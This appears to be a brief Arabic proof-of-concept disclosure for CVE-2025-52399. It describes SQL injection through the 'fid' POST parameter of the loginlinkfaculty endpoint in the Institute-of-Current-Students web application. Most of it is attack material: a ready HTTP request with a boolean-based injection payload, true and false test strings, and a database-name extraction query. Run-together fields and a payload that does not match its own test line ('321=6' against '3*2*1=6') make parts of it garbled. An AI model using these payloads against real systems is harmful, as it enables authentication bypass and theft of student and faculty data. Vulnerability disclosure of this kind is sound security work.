
استغلال إثبات المفهوم لـ CVE-2025-52399، يوضح حقن SQL في نقطة نهاية loginlinkfaculty في Institute-of-Current-Students، مما يتيح تجاوز المصادقة واستخراج البيانات.
نقطة النهاية loginlinkfaculty في تطبيق Institute-of-Current-Students معرّضة لثغرة SQL Injection عبر المعامل fid المُرسَل عبر POST. لا يتم تنقية المعامل بشكل صحيح قبل استخدامه في استعلام SQL، مما يسمح للمهاجمين عن بُعد بتنفيذ أوامر SQL عشوائية.
/loginlinkfaculty (POST)fidicsnewhttp POST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded
fid=-1'+OR+321=6+AND+000942=000942--&pass=example
✅ -1' OR 3*2*1=6 AND 000942=000942 -- → صحيح
❌ -1' OR 2*3=4 AND 000942=000942 -- → خطأ
SELECT database(); -- تُرجع 'icsnew'
Isroil Mustafoqulov